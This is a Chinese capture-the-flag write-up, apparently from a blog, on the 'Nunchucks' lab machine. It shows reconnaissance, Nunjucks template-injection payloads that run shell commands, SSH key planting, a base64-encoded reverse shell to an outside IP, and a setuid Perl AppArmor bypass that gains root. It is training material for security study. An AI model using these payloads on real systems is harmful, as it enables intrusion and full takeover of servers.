資訊搜集
nmap
發現開放埠: SSH (22), HTTP (80), and HTTPS (443)
cosmos@kali:/$ nmap -A 10.10.11.122
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-13 20:44 CST
Stats: 0:00:42 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 99.24% done; ETC: 20:44 (0:00:00 remaining)
Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 99.99% done; ETC: 20:44 (0:00:00 remaining)
Nmap scan report for 10.10.11.122
Host is up (0.29s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6c:14:6d:bb:74:59:c3:78:2e:48:f5:11:d8:5b:47:21 (RSA)
| 256 a2:f4:2c:42:74:65:a3:7c:26:dd:49:72:23:82:72:71 (ECDSA)
|_ 256 e1:8d:44:e7:21:6d:7c:13:2f:ea:3b:83:58:aa:02:b3 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://nunchucks.htb/
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Nunchucks - Landing Page
| ssl-cert: Subject: commonName=nunchucks.htb/organizationName=Nunchucks-Certificates/stateOrProvinceName=Dorset/countryName=UK
| Subject Alternative Name: DNS:localhost, DNS:nunchucks.htb
| Not valid before: 2021-08-30T15:42:24
|_Not valid after: 2031-08-28T15:42:24
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1
5033/tcp filtered jtnetd-server
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.99 seconds
發現80埠重定向到了https://nunchucks.htb,我們將它添加到etc/hosts中
子域名列舉
使用gobuster進行子域名列舉
gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u https://nunchucks.htb/ -k
得到
root@kali:/# gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u https://nunchucks.htb/ -k
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://nunchucks.htb/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/11/13 21:20:42 Starting gobuster in VHOST enumeration mode
===============================================================
Found: store.nunchucks.htb (Status: 200) [Size: 4029]
===============================================================
2021/11/13 21:23:48 Finished
===============================================================
將store.nunchucks.htb也添加到etc/hosts中
nunchucks.htb
進入主頁面
發現了登錄和注冊頁面,但均無法使用
store.nunchucks.htb
一個即將開放的商城界面
在輸入框內輸入電子郵件時,它會回傳該地址
SSTI
由于網站的界面不帶有.php,.jsp等后綴,說明站點可能是go、python、node、go、java等架構,所以我會嘗試ssti
構造{{7*7}}@ss.com,回傳49@ss.com,說明該站點存在ssti漏洞
抓包發現站點架構為express
谷歌搜索nodejs templating engine
發現:https://expressjs.com/en/resources/template-engines.html
其中剛好出現了靶機名稱
繼續谷歌搜索nunchucks template injection,發現了RCE 的POC
http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine
嘗試執行(將雙引號進行轉義)
{{range.constructor("return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')")()}}
成功
執行id,發現當前用戶為david
SSH連接
生成密鑰
ssh-keygen -t ed25519
將我的SSH密鑰寫入/home/david/.ssh/authorized_keys,先創建目錄
{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('mkdir /home/david/.ssh')\")()}}
添加我的公鑰
{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('echo ssh-ed25519 03JGQQvGo7K4XgRoedtSa5G0n90jN30OHybTOewXX/A cosmos@kali > /home/david/.ssh/authorized_keys')\")()}}
將權限設定為600
{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('chmod 600 /home/david/.ssh/authorized_keys')\")()}}
連接
ssh -i /home/cosmos/keys/id_ed25519 david@nunchucks.htb
需要輸入密碼
反彈shell
echo 'bash -c "bash -i >& /dev/tcp/10.10.14.34/53 0>&1"' | base64
//YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zNC81MyAwPiYxIgo=
執行
{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zNC81MyAwPiYxIgo=| base64 -d |bash > ~/.snakin.sh && chmod +x ~/.snakin.sh')\")()}}
{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('ls -l ~/.snakin.sh')\")()}}
{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('bash ~/.snakin.sh')\")()}}
本機監聽
nc -lvp 53
不知道為什么失敗了
嘗試:
{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zNC81MyAwPiYxIgo=| base64 -d |bash ')\")()}}
終于連接成功了(感動!!)
提權
在下面 /opt有一個用 Perl 撰寫的備份腳本,
cat backup.pl
#!/usr/bin/perl
use strict;
use POSIX qw(strftime);
use DBI;
use POSIX qw(setuid);
POSIX::setuid(0);
my $tmpdir = "/tmp";
my $backup_main = '/var/www';
my $now = strftime("%Y-%m-%d-%s", localtime);
my $tmpbdir = "$tmpdir/backup_$now";
sub printlog
{
print "[", strftime("%D %T", localtime), "] $_[0]\n";
}
sub archive
{
printlog "Archiving...";
system("/usr/bin/tar -zcf $tmpbdir/backup_$now.tar $backup_main/* 2>/dev/null");
printlog "Backup complete in $tmpbdir/backup_$now.tar";
}
if ($> != 0) {
die "You must run this script as root.\n";
}
printlog "Backup starts.";
mkdir($tmpbdir);
&archive;
printlog "Moving $tmpbdir/backup_$now to /opt/web_backups";
system("/usr/bin/mv $tmpbdir/backup_$now.tar /opt/web_backups/");
printlog "Removing temporary directory";
rmdir($tmpbdir);
printlog "Completed";
當腳本使用shebang時,如何繞過AppArmor的檢測:
https://bugs.launchpad.net/apparmor/+bug/1911431
https://blog.ssrf.in/post/apparmor-bypass-technique/
在tmp目錄下創建腳本
#!/usr/bin/perl
use POSIX qw(setuid);
POSIX::setuid(0);
exec "/bin/sh";
通過./poc.pl運行,得到root權限
cat root/root.txt
得到flag
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/357026.html
標籤:其他
上一篇:fofa穩定爬蟲——可視化
下一篇:CVE-2019-14287復現